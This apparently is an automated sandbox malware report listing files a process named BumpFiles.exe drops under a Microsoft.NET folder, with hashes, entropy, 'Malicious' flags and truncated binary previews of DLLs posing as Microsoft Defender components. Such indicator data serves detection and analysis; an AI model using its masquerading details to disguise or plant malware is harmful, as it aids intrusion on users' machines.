                                                                  Preview:..#.p.r.a.g.m.a. .n.a.m.e.s.p.a.c.e. .(. .".\.\.\.\...\.\.r.o.o.t.\.\.M.i.c.r.o.s.o.f.t.\.\.W.i.n.d.o.w.s.\.\.D.e.f.e.n.d.e.r.\.\.M.S._.4.0.9.".).........#.p.r.a.g.m.a. .d.e.l.e.t.e.c.l.a.s.s.(.".M.S.F.T._.M.p.C.o.m.p.u.t.e.r.S.t.a.t.u.s.".,.n.o.f.a.i.l.).....#.p.r.a.g.m.a. .d.e.l.e.t.e.c.l.a.s.s.(.".M.S.F.T._.M.p.E.v.e.n.t.".,.n.o.f.a.i.l.).....#.p.r.a.g.m.a. .d.e.l.e.t.e.c.l.a.s.s.(.".M.S.F.T._.M.p.H.e.a.r.t.B.e.a.t.".,.n.o.f.a.i.l.).....#.p.r.a.g.m.a. .d.e.l.e.t.e.c.l.a.s.s.(.".M.S.F.T._.M.p.P.r.e.f.e.r.e.n.c.e.".,.n.o.f.a.i.l.).....#.p.r.a.g.m.a. .d.e.l.e.t.e.c.l.a.s.s.(.".M.S.F.T._.M.p.S.c.a.n.".,.n.o.f.a.i.l.).....#.p.r.a.g.m.a. .d.e.l.e.t.e.c.l.a.s.s.(.".M.S.F.T._.M.p.S.i.g.n.a.t.u.r.e.".,.n.o.f.a.i.l.).....#.p.r.a.g.m.a. .d.e.l.e.t.e.c.l.a.s.s.(.".M.S.F.T._.M.p.T.h.r.e.a.t.".,.n.o.f.a.i.l.).....#.p.r.a.g.m.a. .d.e.l.e.t.e.c.l.a.s.s.(.".M.S.F.T._.M.p.T.h.r.e.a.t.C.a.t.a.l.o.g.".,.n.o.f.a.i.l.).....#.p.r.a.g.m.a. .d.e.l.e.t.e.c.l.a.s.s.(.".M.S.F.T._.M.p.T.h.r.e.a.t.D.e.t.e.c.t.i.

                                                                  C:\Program Files (x86)\Microsoft.NET\en-US\shellext.dll.mui

                                                                  Download File
                                                                  Process:C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exe
                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):3072
                                                                  Entropy (8bit):3.3889790046988564
                                                                  Encrypted:false
                                                                  SSDEEP:48:ypY55M0IyyS/kVrx1TIZWqHWq6sffm0/iy5Ww13/:73IakVrvTEWiH5Wwd
                                                                  MD5:C99D5885AAB799E23E6E5498D0D1B07C
                                                                  SHA1:33450BDC3CDA46CEC0AF5467826143C46624E597
                                                                  SHA-256:C789A39DE6F9DF1A85BDB495D7F9955E1F673FBDBC0B77863D4595A4C4DA82F4
                                                                  SHA-512:8E583EBCC5A867E38BBB0A8A9EE40976AE949A130E2C4DB7B7CB82B3E815E3E785E15411BA4AADCF84ABCA8783E02D09FDDBAE736C3F326EC851D1B2193EC3B8
                                                                  Malicious:true
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........t=.M.S.M.S.M.S..m..L.S..mQ.L.S.RichM.S.................PE..L..................!.........................................................0......W.....@.......................................... ..................................8............................................................................rdata..............................@..@.rsrc........ ......................@..@.....5<)........l...P...P........5<)........$...........................................8....rdata..8........rdata$voltmd...P........rdata$zzzdbg.... .......rsrc$01..... .......rsrc$02.... ....x.j...!(y....l......)(2r.5<)........................................................................................................................................................................................................................................................................

                                                                  C:\Program Files (x86)\Microsoft.NET\endpointdlp.dll

                                                                  Download File
                                                                  Process:C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exe
                                                                  File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):685328
                                                                  Entropy (8bit):6.2613956335812
                                                                  Encrypted:false
                                                                  SSDEEP:12288:pRCT1SH7y45rUcOoza9hW+WSAh7Z1a6MLoloKfihqPgwX:pySH7yGUI+WL7ra6MLolrfihqh
                                                                  MD5:113DB043FE13F4635D0A65FDF100CFD3
                                                                  SHA1:1DF847E5E1680669FE0DF779B66942C521B47012
                                                                  SHA-256:716BA8B125E70C4D717262381B3A31203C41442B680651729ADF12059B53123F
                                                                  SHA-512:0B66C78C11DF7FCB8971FDB658D9372E06CC2A0D5AA116864E2D79099E660FB1A9F40368BFE590C6CCE5AA07DA592F89F0327D8EC02467EFBF720860C47BEB16
                                                                  Malicious:true
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........W..[6..[6..[6...C..Z6..D..N6..[6..x7..D..H6..D..x6..D..6..D..Y6...C..Z6...C...6...C..Z6...C..Z6..Rich[6..........................PE..d.....&..........." .........`......@........................................p............`A............................................<............P..0........P...P...%...`......0...p...................XN..(... M..8............N...............................text...E........................... ..`.rdata.............................@..@.data...h@.......0..................@....pdata...P.......`..................@..@.rsrc...0....P.......0..............@..@.reloc.......`.......@..............@..B........................................................................................................................................................................................................................................

                                                                  C:\Program Files (x86)\Microsoft.NET\fuge.zip

                                                                  Download File
                                                                  Process:C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exe
                                                                  File Type:data
                                                                  Category:dropped
                                                                  Size (bytes):8764801
                                                                  Entropy (8bit):7.999974027044619
                                                                  Encrypted:true
                                                                  SSDEEP:196608:He+u4ln80jwTABJKUiD2iS1+sGRVc3PC3s3Z6oF+nzPZp:HeZ4N80jwG3W2xR2YP6MX43
                                                                  MD5:88EC493F2A48D234120348AEAB6D3808
                                                                  SHA1:3FB458578198B4691B409FFEABB99EDFE3827EAD
                                                                  SHA-256:4086FF865F27274805EEB8DF9504D381AF17582632FFFD02C81245A3119A3F34
                                                                  SHA-512:9A8CF59D76CBDEB0B03525A1D3E2869688F597F2A10751E13815CB827D92F12A7FCFAB0A32932A55386BE3026124BE9CA51FC2DF6A112D3B2E00141BEBA6F5F9
                                                                  Malicious:false
                                                                  Preview:H~.Ea..kyJ._.....@....<.=..}.]..A.).W.....".gb...s...lR..4p..ekJ.......n...q.~.P......(J!...v.Ma>.<.+(.r.>...F..g8..k e...Rb..S....w...^.,.`...T.9`zC...?.37..._.Y&!..L.I..H.q..3{S.H........D.v1k.[.^n..-.....J....W.c.#y.G,.U....(V..e..EM...-!f...\.}..}.[.."......z...B.q..'c".o......._...T....~.....D.d......J......9w..b.Kik..H..fSQ........&.`.'.......92:....i...~...^...Q.mQ.;pt...."....r]..).mv...q3....H.I./.v..G.....e.4.z"...UsSn...D...I....S.A:.....|.x...*).b..7){.i0.L.r}V6.....3...._.8..XY~.;..~%....:uc.y".7...%.ip..p.....Li..wh...j._..R:.....4..9......`.._.`....PYC..k1....._$..(a..N..A...\..<./.....E..-...dM........i..y..G3!....0q..C*.cm.R&W?.E@.........V..79.Mf........@.G......"#.....$.......g.b.8...tYQZ...d...~>.?.4.v.O........%.?l...R*.!.\....N..`..(..M....h.7TcQ..1.?`.3.|..sX(;....y`..cd..K.....B..|...X.8.......6q.`.....J...2P./G.<...^}....S.'.......J#.....q.k]Zg%..+.@.'[...cE7....g......2w<.J....1s]##....n..!.U..#.. ..6"

                                                                  C:\Program Files (x86)\Microsoft.NET\fuge.zip1

                                                                  Download File
                                                                  Process:C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exe
                                                                  File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                  Category:dropped
                                                                  Size (bytes):8764801
                                                                  Entropy (8bit):7.995971570571292
                                                                  Encrypted:true
                                                                  SSDEEP:196608:sL/pb5vj/q8cFmGRouNMASrmNOpzEPbL56gRLDh4eoJx1JG:6h5vD0JRTPux4ZLRoJx1JG
                                                                  MD5:924C6BB2D6985A7BD8D6B0B3AF3D81B7
                                                                  SHA1:FD36D0B778FA1522705BF7FCD350535F1ADE3CA5
                                                                  SHA-256:008B8E5E1286E96A1FA878DA2D6B48A70C62C56359519A90B713DB450F3ECD7F
                                                                  SHA-512:F3677CF016835914A8DEB80A225C27165A8CF135F7F336F6BB897AE26A6C0DD40D96826CEB5E4B4C42040CB5A6490DC9B5B0690948EF1E235ACC632EAF2D1570
                                                                  Malicious:false
                                                                  Preview:PK........e..T*.u.bp..PE......AMMonitoringProvider.dll.Z{xTE..~..!inc.. ..:.0d"-..2_7$K5.h..0 ..00*$...a....l.......e..>..qd1.;....cP.8..vl......=...G......n.n..y.S.n'.p31.B..(.!UD-n..%.........GU..f-]..^R...e.>a/zt...>....e...e....?.bqq....a..^LG7E..g.j\....Kx...^|....oo\......8...hR....eEK./*kA.!..=...+.D...h{.~..B. ....>..Xxs..O...x.2...4#.o.G..J..U1...d...v#...lNAa...V4...d..].!......,...d,....V...u..a.........i..:^.,.,[...QB..CX.&....|......7jX.=.B.%*!.M.......,+"D....f....E...m.....T.W.J_.+}......W.J_.+}..cZ)..g.....4hN.VGZ...Xo.g-7...`.=....iP..zBe.....@....T.*.k.I.....C#...-.{..;.w..........C....4Z.....]rkS.k.......n.:..MA.@...Z..{F..>B....F...&G...87..;..Y@>q....z.s7^.Ezd.Y>.A....m.@$...)'`~.$..@F...Z.~......N}F..w._..7O...zR....)..$eQ....e..4G...q"...*...z"..%h.R.......H8..'u.B....~..T....Bh..s./....D.@.T..l.......A...&O..c85..8.#.....s.~......D.k.4m..........wqe..'.b2...o.o:.e..Wq..p>...Pq.....&.p.9N-...qj4.6[.gG.G...6..

                                                                  C:\Program Files (x86)\Microsoft.NET\pt-BR\EppManifest.dll.mui

                                                                  Download File
                                                                  Process:C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exe
                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):3072
                                                                  Entropy (8bit):3.688226991598996
                                                                  Encrypted:false
                                                                  SSDEEP:24:eH1GSp8zgpXLUCZIN/G15JqZW0Iyc5ArqA5+DScNffzJ2Uh7/5L3guolb9fPN3Tu:ypA2zZ+G1zqZW7PA5afff5TN4x93S
                                                                  MD5:66D970ACC9C33581B9E3152CDF46C707
                                                                  SHA1:7C3ACD65D71B94837B837DFB52C1FC48E8B98F0C
                                                                  SHA-256:36F0DA44D38A45FD585CFC84B03C00185DB00F103A655821B5BD6FCCD88EB426
                                                                  SHA-512:C154E38181825C9F844ECEBAC6213FBA9C2792849097451758FCE11D728763135CA0211BB91BFADA310B2C371D77B25E6BD4CA131AD8E72815543A2F7909DFB2
                                                                  Malicious:true
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........t=.M.S.M.S.M.S..m..L.S..mQ.L.S.RichM.S.................PE..L..................!.........................................................0............@.......................................... ..................................8............................................................................rdata..............................@..@.rsrc........ ......................@..@.....a..........l...P...P........a..........$...........................................8....rdata..8........rdata$voltmd...P........rdata$zzzdbg.... .......rsrc$01..... .......rsrc$02.... ...p..uI..$f.}II...3v...~.qIp;.a..........................................................................................................................................................................................................................................................................

                                                                  C:\Program Files (x86)\Microsoft.NET\pt-BR\MpAsDesc.dll.mui

                                                                  Download File
                                                                  Process:C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exe
                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):55808
                                                                  Entropy (8bit):3.370538627905652
                                                                  Encrypted:false
                                                                  SSDEEP:384:8ELIoHwex9cxks8ntGfFDD4vlzAQQ+8+jBUJ3P+/npK5sD8XOHKXSXSXuCilXYMY:dLIoHwex9cxMtOkA3+FRpKIl5i
                                                                  MD5:50C3A70FA84C07A424EC3D2834D06523
                                                                  SHA1:4FD26B0566F31172BAC62B839ED5CB62B6625AD5
                                                                  SHA-256:95A2C437329C4C4DF4919152BC90284A90857122E4B9C868C36F103ACC52A028
                                                                  SHA-512:DE9358CE4269187C60F9CFD7E4B913747A403BC2F069C877E220AED02B63AFEC6BA115B4F79C1BBD4AC80DCFBBDBFC1739DDE34983D8DC0A10B027B41142CB91
                                                                  Malicious:true
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........t=.M.S.M.S.M.S..m..L.S..mQ.L.S.RichM.S.................PE..L..................!................................................................6V....@.......................................... ..................................8............................................................................rdata..............................@..@.rsrc........ ......................@..@....d...........l...P...P.......d...........$...........................................8....rdata..8........rdata$voltmd...P........rdata$zzzdbg.... .......rsrc$01.....(..@....rsrc$02.... ....^K..8.........HQM....H..IMd...........................................................................................................................................................................................................................................................................

                                                                  C:\Program Files (x86)\Microsoft.NET\pt-BR\MpEvMsg.dll.mui

                                                                  Download File
                                                                  Process:C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exe
                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):47104
                                                                  Entropy (8bit):3.506031927133505
                                                                  Encrypted:false
                                                                  SSDEEP:384:RXSmktkGpXilFdOUry+KoK2o4XqPA/RDkVQyiQ8oiKEu8+k9Ko8uWJl:E5tVD0DuZl
                                                                  MD5:CE84B2A9F6DF190FA977504B51536808
                                                                  SHA1:08EC7406B12042AD09EE7D3124863A57CE30F197
                                                                  SHA-256:A7224212D1D6FEC1558709633EBB1580CFB6CAB230624F548239A974C7A0D6AF
                                                                  SHA-512:5F68ABC2DB6A92D195D656695A22FC5C01F135263966567227A7771F3ECA4B7690BB5278B49B30E8BD11EE4124D29F943241E0AA5A69B69FB5202DCDD2B80841
                                                                  Malicious:true
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........t=.M.S.M.S.M.S..m..L.S..mQ.L.S.RichM.S.................PE..L..................!................................................................q.....@.......................................... ..................................8............................................................................rdata..............................@..@.rsrc........ ......................@..@.....D%.........l...P...P........D%.........$...........................................8....rdata..8........rdata$voltmd...P........rdata$zzzdbg.... .......rsrc$01..... ......rsrc$02.... ..........f...T.e.J#.3...:.o...D%.........................................................................................................................................................................................................................................................................

                                                                  C:\Program Files (x86)\Microsoft.NET\pt-BR\MsMpRes.dll.mui

                                                                  Download File
                                                                  Process:C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exe
                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):8704
                                                                  Entropy (8bit):3.583197744926803
                                                                  Encrypted:false
                                                                  SSDEEP:192:7HXRd28sT8KNWW+WfjIWe/W9WZWeWW+WfjIWe/WlWkNWSuWOJW:7hd28sT1NWXWkW+W9WZWeWXWkW+WlWk/
                                                                  MD5:5D46933E794A91BFDF12CDA3348BDE8B
                                                                  SHA1:F940EC0F7C8DC00F599D24020C6785D217C8B07F
                                                                  SHA-256:69550BAD9F1CD6BAB05EC9DACD5A105BF2CBD93856217AFD6722F9C62CAB104F
                                                                  SHA-512:CCDC2E8015CC1C97B475A32F7F451C1B78CD1C80CD10E79DB123A30D5B8BA120F0D5CD68DC25DD19A09834553D072E56A4AC406AEC4C73B7DC9E199D8309C6A1
                                                                  Malicious:true
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........t=.M.S.M.S.M.S..m..L.S..mQ.L.S.RichM.S.................PE..L..................!......... ...............................................@......^.....@.......................................... ..................................8............................................................................rdata..............................@..@.rsrc.... ... ......................@..@....oM.7........l...P...P.......oM.7........$...........................................8....rdata..8........rdata$voltmd...P........rdata$zzzdbg.... .......rsrc$01.....".......rsrc$02.... ...Z..../..)......C....b.)....oM.7........................................................................................................................................................................................................................................................................

                                                                  C:\Program Files (x86)\Microsoft.NET\pt-BR\OfflineScannerShell.exe.mui

                                                                  Download File
                                                                  Process:C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exe
                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):8192
                                                                  Entropy (8bit):3.658761008984688
                                                                  Encrypted:false
                                                                  SSDEEP:96:82qJtEfs2mSpy99V9KzEcEKLqBrEhMABGTzG1BNB9SBJWp+CWMeO4x9:82qJaPmDAzzDgBJWpFWMeT9
                                                                  MD5:353FFC1C5EAF0A900FABCAAB968ED76E
                                                                  SHA1:ED9F2EDA723C924D2F22F9B1F3EDF0A0B522A02B
                                                                  SHA-256:36B16B933C7E5EB93A2AD8D11F38C7793B60F09472EC9664C17E786C7361551E
                                                                  SHA-512:A28C3EC8A503BB133B9EFA158D6454CB6A39A3A4F4E98C13A19901D4DE1A86153AC081B5AF8B9CF01D45A33A8946A07CB1DB2081D89D2EB1A431416DA171542A
                                                                  Malicious:true
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........t=.M.S.M.S.M.S..m..L.S..mQ.L.S.RichM.S.................PE..L..................!.........................................................@......Mk....@.......................................... ..................................8............................................................................rdata..............................@..@.rsrc.... ... ......................@..@....o..........l...P...P.......o..........$...........................................8....rdata..8........rdata$voltmd...P........rdata$zzzdbg.... ..p....rsrc$01....p"..8....rsrc$02.... ...5...p.......9ps].A,wEW.....o..........................................................................................................................................................................................................................................................................

                                                                  C:\Program Files (x86)\Microsoft.NET\pt-BR\ProtectionManagement.dll.mui

                                                                  Download File
                                                                  Process:C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exe
                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):39936
                                                                  Entropy (8bit):3.5026787417351337
                                                                  Encrypted:false
                                                                  SSDEEP:384:0R6xvTgGhZ88YmErAJwj18ChH1WgQLP89oH10fBrLjDWQWyg:qogaHYtAfc1akI1aLPg
                                                                  MD5:6817F98F4E0D412F0313C417100B89A6
                                                                  SHA1:4B1D40AE23935F47BE28E45827404C008481BE5B
                                                                  SHA-256:BA423B0529EDD4AC44F0A8FA2AABB28A3B422EEF351C3E0C06E44544350683CC
                                                                  SHA-512:07034BA97D2CF7C7334E72F998529A40C6AFB0B94881DA107ABDAB09753A8F7B575451AB06B0C6BC52BBE230B4B14F6BDA3612B9B65C7E1C0027DAD53CC34BC5
                                                                  Malicious:true
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........t=.M.S.M.S.M.S..m..L.S..mQ.L.S.RichM.S.................PE..L..................!.....................................................................@.......................................... ..................................8............................................................................rdata..............................@..@.rsrc........ ......................@..@.....]'.........l...P...P........]'.........$...........................................8....rdata..8........rdata$voltmd...P........rdata$zzzdbg.... .......rsrc$01.....%......rsrc$02.... ...@.`........m\.L.HO...i.<.U.x.]'.........................................................................................................................................................................................................................................................................

                                                                  C:\Program Files (x86)\Microsoft.NET\pt-BR\ProtectionManagement.mfl

                                                                  Download File
                                                                  Process:C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exe
                                                                  File Type:C source, Unicode text, UTF-16, little-endian text, with very long lines (9654), with CRLF line terminators
                                                                  Category:dropped
                                                                  Size (bytes):103370
                                                                  Entropy (8bit):3.5117432836886926
                                                                  Encrypted:false
                                                                  SSDEEP:1536:0UijGqj13Lh495o14sJ5nGY4w2Y4CZnm//:WGqjFC95oqkVZk
                                                                  MD5:EAC0C55B5DDE369B236E10E36FAFECA5
                                                                  SHA1:1E19CE7B3E89460ABE9552E6B7EB3CECE169C67F
                                                                  SHA-256:71FB552585CD8C9496BF3127A6D032E6C76DFCF6C5A141B546A735F214905CCE
                                                                  SHA-512:B7406D4E02D65248DE901C6FD4CACF53A37FC932188B40FEB564937DA777296CBE22899893BCB00C56DCB5EC2D9F7966C1506BC76A2490AFD15CFA54B3F15C7C
                                                                  Malicious:false
                                                                  Preview:..#.p.r.a.g.m.a. .a.u.t.o.r.e.c.o.v.e.r.....#.p.r.a.g.m.a. .n.a.m.e.s.p.a.c.e.(.".\.\.\.\...\.\.r.o.o.t.\.\.M.i.c.r.o.s.o.f.t.\.\.W.i.n.d.o.w.s.\.\.D.e.f.e.n.d.e.r.".).....i.n.s.t.a.n.c.e. .o.f. ._._.n.a.m.e.s.p.a.c.e.{. .n.a.m.e.=.".M.S._.4.1.6.".;.}.;.....#.p.r.a.g.m.a. .n.a.m.e.s.p.a.c.e.(.".\.\.\.\...\.\.r.o.o.t.\.\.M.i.c.r.o.s.o.f.t.\.\.W.i.n.d.o.w.s.\.\.D.e.f.e.n.d.e.r.\.\.M.S._.4.1.6.".).........[.D.e.s.c.r.i.p.t.i.o.n.(.".E.s.t.a. ... .u.m.a. .c.l.a.s.s.e. .a.b.s.t.r.a.t.a. .q.u.e. .m.o.s.t.r.a. .o. .s.t.a.t.u.s. .b.a.s.e...".). .:. .A.m.e.n.d.e.d. .T.o.S.u.b.c.l.a.s.s.,.A.M.E.N.D.M.E.N.T.,. .L.O.C.A.L.E.(.".M.S._.4.1.6.".).]. .....c.l.a.s.s. .B.a.s.e.S.t.a.t.u.s.....{.....}.;.........[.D.e.s.c.r.i.p.t.i.o.n.(.".E.s.t.a. ... .u.m.a. .c.l.a.s.s.e. .a.b.s.t.r.a.t.a. .q.u.e. .m.o.s.t.r.a. .o. .s.t.a.t.u.s. .b.a.s.e...".). .:. .A.m.e.n.d.e.d. .T.o.S.u.b.c.l.a.s.s.,.A.M.E.N.D.M.E.N.T.,. .L.O.C.A.L.E.(.".M.S._.4.1.6.".).]. .....c.l.a.s.s. .M.S.F.T._.M.p.C.o.m.p.u.t.e.r.S.t.a.t.u.s. .

                                                                  C:\Program Files (x86)\Microsoft.NET\pt-BR\ProtectionManagement_Uninstall.mfl

                                                                  Download File
                                                                  Process:C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exe
                                                                  File Type:C source, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                  Category:dropped
                                                                  Size (bytes):1118
                                                                  Entropy (8bit):3.459513705694916
                                                                  Encrypted:false
                                                                  SSDEEP:24:QXbclK2UWvlDQzj3WvlDQzCWvlDQzwNWvlDQzYTYWvlDQzfWvlDQzyWvlDQzEWvT:e1TjDGwJ3r24RFZC
                                                                  MD5:606AA235BE1B21761E91A75475BB4CCA
                                                                  SHA1:437D21FC2BDD385A6540428B2B99D45191A38BB2
                                                                  SHA-256:9437B33FEDF880B480913612671D83AA56D7753B76D5E728DD73B9205E8A9B98
                                                                  SHA-512:3DAB122B4C4E868E687888579C0C3D3EAB561BA9F560B9A01ECC705FC5FD41B52EE42BC749382C122BA3DAA9BC203B1231DCC948654C36DC2F9B0D47A62AD6BF
                                                                  Malicious:false
                                                                  Preview:..#.p.r.a.g.m.a. .n.a.m.e.s.p.a.c.e. .(. .".\.\.\.\...\.\.r.o.o.t.\.\.M.i.c.r.o.s.o.f.t.\.\.W.i.n.d.o.w.s.\.\.D.e.f.e.n.d.e.r.\.\.M.S._.4.1.6.".).........#.p.r.a.g.m.a. .d.e.l.e.t.e.c.l.a.s.s.(.".M.S.F.T._.M.p.C.o.m.p.u.t.e.r.S.t.a.t.u.s.".,.n.o.f.a.i.l.).....#.p.r.a.g.m.a. .d.e.l.e.t.e.c.l.a.s.s.(.".M.S.F.T._.M.p.E.v.e.n.t.".,.n.o.f.a.i.l.).....#.p.r.a.g.m.a. .d.e.l.e.t.e.c.l.a.s.s.(.".M.S.F.T._.M.p.H.e.a.r.t.B.e.a.t.".,.n.o.f.a.i.l.).....#.p.r.a.g.m.a. .d.e.l.e.t.e.c.l.a.s.s.(.".M.S.F.T._.M.p.P.r.e.f.e.r.e.n.c.e.".,.n.o.f.a.i.l.).....#.p.r.a.g.m.a. .d.e.l.e.t.e.c.l.a.s.s.(.".M.S.F.T._.M.p.S.c.a.n.".,.n.o.f.a.i.l.).....#.p.r.a.g.m.a. .d.e.l.e.t.e.c.l.a.s.s.(.".M.S.F.T._.M.p.S.i.g.n.a.t.u.r.e.".,.n.o.f.a.i.l.).....#.p.r.a.g.m.a. .d.e.l.e.t.e.c.l.a.s.s.(.".M.S.F.T._.M.p.T.h.r.e.a.t.".,.n.o.f.a.i.l.).....#.p.r.a.g.m.a. .d.e.l.e.t.e.c.l.a.s.s.(.".M.S.F.T._.M.p.T.h.r.e.a.t.C.a.t.a.l.o.g.".,.n.o.f.a.i.l.).....#.p.r.a.g.m.a. .d.e.l.e.t.e.c.l.a.s.s.(.".M.S.F.T._.M.p.T.h.r.e.a.t.D.e.t.e.c.t.i.

                                                                  C:\Program Files (x86)\Microsoft.NET\pt-BR\shellext.dll.mui

                                                                  Download File
                                                                  Process:C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exe
                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):3584
                                                                  Entropy (8bit):3.7438394010156575
                                                                  Encrypted:false
                                                                  SSDEEP:48:ypr95MHUR8U6NFc4qy/F1rqZWd9hffmb/i7N4x93S:q0oyW9urCWCI4xs
                                                                  MD5:3464E072F66FFE6CF4DF06CF9C11D331
                                                                  SHA1:197566FD1A73D5BE8D3A720A51DB02329C6DFC54
                                                                  SHA-256:EF12115438168F6CFD797E991A7BE561812719EB31127EBC8E0B418726452520
                                                                  SHA-512:1FBC4432610257E7A5A152E07EA905EEF6DF0F15558231C01AA4C0E89A39C9FF6ABF77C8C9644BDB224B47B9E4915DA16CAFD3CC3C58A74F9EC7A9E5C4D9AD2A
                                                                  Malicious:true
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........t=.M.S.M.S.M.S..m..L.S..mQ.L.S.RichM.S.................PE..L..................!.........................................................0............@.......................................... .. ...............................8............................................................................rdata..............................@..@.rsrc........ ......................@..@.....5<)........l...P...P........5<)........$...........................................8....rdata..8........rdata$voltmd...P........rdata$zzzdbg.... .......rsrc$01..... .......rsrc$02.... ....x.j...!(y....l......)(2r.5<)........................................................................................................................................................................................................................................................................

                                                                  C:\Program Files (x86)\Microsoft.NET\shellext.dll

                                                                  Download File
                                                                  Process:C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exe
                                                                  File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):468312
                                                                  Entropy (8bit):5.621872137435956
                                                                  Encrypted:false
                                                                  SSDEEP:6144:+/fJNDoSCaKgg6OEBCOJzXv5ApNMY0lESLMp+W8j1sl3FIY/VLIVuV3Y0CC7HHmc:+/fDTCzgg6T3ALULE+WNl3yCIBL+
                                                                  MD5:85E67579A416A86D726D4AEC49F0EF87
                                                                  SHA1:2D7D1C1213B09924F926D9C6197A60CC3F617B3C
                                                                  SHA-256:112891EB9C3B06F6B95919E34BDDC607AF76EB9AEAEDE8E3BF3147709F0AE3B4
                                                                  SHA-512:0FB7A0C0A510A4EC9540B5A6EBA94D27BEEB4B9AE7E17DEF1DD3EF095ACAE5E66ED067EFE4A9873EB73969F48EBF29A0B7B042CEFA9C1E2187B41C00F3ED933F
                                                                  Malicious:true
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......-G..i&..i&..i&..`^<.o&.."^..m&.."^..{&..i&...'.."^..L&.."^..c&.."^..h&.."^...&.."^P.h&.."^..h&..Richi&..........PE..d....l\..........." .........0...... ...............................................p,....`A................................................x............c...`...-......X%...........R..p.......................(...@...@............................................text............................... ..`.rdata..Z).......0..................@..@.data....H.......@..................@....pdata...-...`...0...P..............@..@.rsrc....c.......p..................@..@.reloc..............................@..B................................................................................................................................................................................................................................................................

                                                                  C:\Users\user\AppData\Local\ContentPack\BumpFiles.exe

                                                                  Download File
                                                                  Process:C:\Users\user\AppData\Local\SquirrelTemp\Update.exe
                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):196096
                                                                  Entropy (8bit):6.4589375341129225
                                                                  Encrypted:false
                                                                  SSDEEP:3072:GZzaqLh5m21b4n86fZHi8c62bdq32BsWtEGwF4JOAg0FuDTT6E675MU:GZzvhs2Z4n1E7g34XtVYAOfTd0uU
                                                                  MD5:4490642C30F86355647A3154D5A25D7A
                                                                  SHA1:FD368F63A66C554B8E3A493D8B7BC2B834CD17A5
                                                                  SHA-256:77D6C8E668F33DFDA787CBF82BDF8D88F9B66B36F3631BECAE2AE92E9C9E9229
                                                                  SHA-512:6563482F84B9FBFC4D14C677ED4E605BD1F1D0976DFA2B7D0D08CBA850814A5006B314224E9017E6A653CBA61D0B4A4F51FF83AF19824F00AA39DDFAFA6CC81B
                                                                  Malicious:true
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........e..O.S.O.S.O.S.).R.O.S.).R.O.S.).R.O.S.'.R.O.S.'.R.O.S.'.R.O.S.).R.O.S.O.S.O.S5&.R.O.S5&.S.O.S.O.S.O.S5&.R.O.SRich.O.S........................PE..L.....p_.....................>......+.............@..........................@............@.....................................<................................!......p...............................@...............,............................text...8........................... ..`.rdata..V...........................@..@.data....#..........................@....rsrc...............................@..@.reloc...!......."..................@..B........................................................................................................................................................................................................................................................................................

                                                                  C:\Users\user\AppData\Local\ContentPack\Update.exe

                                                                  Download File
                                                                  Process:C:\Users\user\AppData\Local\SquirrelTemp\Update.exe
                                                                  File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):1899520
                                                                  Entropy (8bit):5.894883178349122
                                                                  Encrypted:false
                                                                  SSDEEP:24576:pWltPuAnUCiag6CKM2zCy9sQuOjj1VgZej6GeS4lNrCze5qhYp4t9m2:0t3UCiag6CKM2zCyZuOjJaxSS5qh
                                                                  MD5:A560BAD9E373EA5223792D60BEDE2B13
                                                                  SHA1:82A0DA9B52741D8994F28AD9ED6CBD3E6D3538FA
                                                                  SHA-256:76359CD4B0349A83337B941332AD042C90351C2BB0A4628307740324C97984CC
